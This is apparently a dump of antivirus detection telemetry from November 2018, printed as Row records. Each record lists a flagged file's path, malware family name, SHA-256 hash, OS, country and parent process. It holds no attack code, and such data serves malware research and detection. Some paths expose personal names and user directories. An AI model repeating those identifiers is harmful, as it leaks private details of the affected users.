  Row(detection=Row(filename='nl.exe', filepath='F:\\New folder\\Corel Draw 12\\Apple\\NL\\NL.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184221-a540b50c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-184120-9C2ABE8B\\AVSCAN-20181101-184221-A540B50C', filesize=64000, name='VBA/Dldr.Agent.kiizk.#M1.#R1'), hash='5429bb6a050dec472d9ef03c6016da3382924c217a0f9e4b47a4dff5db66423a', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:42:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='e:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T20:08:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161620-f1c3d2d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2cd1ddcd\\AVSCAN-20181101-161148-D5525E98\\AVSCAN-20181101-161620-F1C3D2D5', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='3ddfe389744ddf69f04615b4ed17a2f5626edc20f4d5e790680904157ab8eede', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:16:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fomer', filepath='C:\\WINDOWS\\SYSTEM32\\TASKS\\YAHOO! POWERED FOMER', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='9181846258d386386a8495c47d25fa0d650b9c3d89a88aefa19fed328dee4dbe', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:15:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a4cdbca9a43dfb941bb8b982caf8aa3d9ddff4d9a4849e6a8b4ed95ba6c1b921.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_20.10.2019-12.available\\Avira\\A4CDBCA9A43DFB941BB8B982CAF8AA3D9DDFF4D9A4849E6A8B4ED95BA6C1B921.VIR', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='a4cdbca9a43dfb941bb8b982caf8aa3d9ddff4d9a4849e6a8b4ed95ba6c1b921', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T06:55:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='getdiskserial.exe', filepath='K:\\HBCD\\Programs\\GETDISKSERIAL.EXE', filesize=64000, name='TR/Siggen.psvbr.#M1.#R1'), hash='bc0a114c0973d821f584a672f3d2c3b951288a0e721901ada7bd47acea4cdd2d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\1pe4doaspfw\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:50:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152248-928ac4ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152248-928AC4EE', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:22:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='termoidraulica.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\TERMOIDRAULICA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ut9tl4ek.exe', filepath='C:\\New folder\\برامج مكافحة للفيروسات\\ut9tl4ek.exe', filesize=384000, name='HEUR/AGEN.1000498.#M1.#R1'), hash='a146cfe85e2301113fd71b2c667234a314bd021295f358d9bc414274f40c7928', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T21:59:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rlistupdater', filepath='/Volumes/backup/Backups.backupdb/MacBook Pro de erly wilson/2017-09-12-235335/Erly W/Users/erlywilson/Library/Application Support/amc/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='BR', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pizzaiolo.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\ALIMENTARI\\PIZZAIOLO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:11:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh64c8.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH64C8.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='d343102e68b12246d7efcc2c07f1b8dd8957f2f1dedd32da1a7cd846b88e9efe', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:31:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='assistente familiare 2° livello.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SOCIO SANITARI\\ASSISTENTE FAMILIARE 2° LIVELLO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094711-1e0a974b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094711-1E0A974B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:47:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pro marketing 007.exe', filepath='\\\\?\\C:\\Program Files (x87)\\Pro Marketing 007.exe', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='db3ce180d8e077c85a3fdd13bef6f4318e5d77f9e8474e3a9a53395fe5dc444c', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:41:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165817-7e6b2ca5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d44abda7\\AVSCAN-20181101-165623-7572B90A\\AVSCAN-20181101-165817-7E6B2CA5', filesize=64000, name='HEUR/Macro.Downloader.FAB.Gen.#M1.#R1'), hash='9766a96e18bebe93b58cfb3154a35ae732c466884e0d7343b6d888b596e47132', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:58:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152833-d4b75f1e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152833-D4B75F1E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:28:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{7C63A674-7475-4F34-AAD8-AB6ADBE6A158}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='cb2da8e0195615e58b563efc9de645ba81d451d481389a639afeb5dcc13bb960', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:00:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsn9CBE.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T07:53:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tintolavanderia.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI NUOVI DEFINIITIVI\\schede presentazione corsi\\schede ultime APRILE 2016\\tintolavanderia.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:15:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0040210.exe', filepath='e:\\system volume information\\_restore{68daf5b2-45b2-4aaf-8503-fb4b3a8be63c}\\rp8\\A0040210.exe', filesize=104000, name='W32/Sality.AT.#M1.#R1'), hash='bde3ed564afd1359fd9226e16aa9a25069a2c75ec01743303baacb05144b247f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:27:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\ab4rlhvj0m2\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540912029.5bd8739d3b7a5', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emtak\\214531731.exe', parentsize=670720, timestamp='2018-11-01T02:21:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='codectweaktool.exe', filepath='C:\\Program Files (x86)\\K-Lite Codec Pack\\Tools\\CodecTweakTool.exe', filesize=1216000, name='W32/Jeefo.A.#M1.#R1'), hash='89293a60fbe5bcc3f18435e7491129b0dd79b3595afe9ea1c284f36a4305194f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T20:44:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\zuwzjjv4aha\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T17:38:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-215024-3402359b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77e93ea4\\AVSCAN-20181104-214501-F9E185C1\\AVSCAN-20181104-215024-3402359B', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:50:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msinfo32.exe', filepath='\\\\?\\C:\\Windows\\system32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='137e9f3a29c0dbea1e928b20a4ef1e562c63ff12ab657865479d9bc28171fdd1', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:25:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203546-5ce2a192', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3a3942d5\\AVSCAN-20181104-203446-55D8E353\\AVSCAN-20181104-203546-5CE2A192', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='8e2b288f35b23e609aa9ebe86b565b1bda072e8c9f28bc3a4b4d81573a97512c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:35:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T13:43:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-143808-83b7777c', filepath='C:\\Documents and Settings\\X\\Application Data\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-141018-1F4A17CE\\AVSCAN-20181104-143808-83B7777C', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='9600a7a82fa27381b6c5a23c81326e60b1b30a39d0b20feb6a066b67ef1ea05e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:38:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131225-1c96fe12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131225-1C96FE12', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:12:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gassassinscreedrevelations.exe', filepath='D:\\Black_Box\\Assassins Creed - Revelations\\gAssassinsCreedRevelations.exe', filesize=768000, name='W32/Jeefo.A.#M1.#R1'), hash='1958360734022dc3d75ee5ca3c19e0e7ec68b90d3dd301403ff2baf95c96b631', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T15:29:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T20:05:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f_002587', filepath='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_002587', filesize=284000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='8fc53fa6fb56e6d4ccf13d90e6f0a3ad46947261949036a0b08d4508f67d95a1', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1589080, timestamp='2018-11-04T10:38:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202324-74460507', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_34d6dbd1\\AVSCAN-20181104-202212-6D8201BF\\AVSCAN-20181104-202324-74460507', filesize=14208000, name='TR/CoinMiner.593149.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:23:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130831-299aec80', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1ee14c03\\AVSCAN-20181104-130740-20707A78\\AVSCAN-20181104-130831-299AEC80', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='003ba151219f945cb613302233617c71dbf7754e1527a1430de85cb1ac4d433f', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:08:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0343944.exe', filepath='J:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP435\\A0343944.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='8a1b7fc5b143627da76b9a675ea56cf91e8d6c0a79c32b4035197e2ed0497987', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T09:08:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='\\?\\C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:18:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T06:48:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9201631\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Baixaki_Freemake Video Converter_2590833265.exe', parentsize=2297928, timestamp='2018-11-04T16:00:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cloudbackup5892.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\CloudBackup5892.exe', filesize=5600000, name='PUA/MyPCBackup.Gen.#M300.#R5908'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline=None, country='MQ', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T15:03:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-171431-70deea69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e28951c1\\AVSCAN-20181104-170735-27CB4304\\AVSCAN-20181104-171431-70DEEA69', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:14:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wspsetup.exe', filepath='F:\\00\\__DATEN von 2015 bis 2017 12\\2018\\2018 06\\wspsetup.exe', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline='-r', country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Free 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T03:07:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='prst.dll', filepath='F:\\Users\\X\\AppData\\Local\\Temp\\sega\\Prst.dll', filesize=128000, name='TR/SPY.KeyLogger.zakea.#M1.#R1'), hash='a5ed6f4644f888a56ed7c57c53fbb6f1f7a49454db4c09a58fc6617a29b7cb1f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:53:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210056-2aab6fca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-210056-2AAB6FCA', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:00:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210116-2b4cde27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ddab3cce\\AVSCAN-20181104-210053-2940DF3D\\AVSCAN-20181104-210116-2B4CDE27', filesize=256000, name='SPR/Tool.PScan.#M1.#R1'), hash='1fe30670ac6d4917965c71d1f43fe74d9ad44a8dfc58f859863635cd961e5edb', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:01:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T23:20:12Z'), dt=datetime.date(2018, 11, 4)),
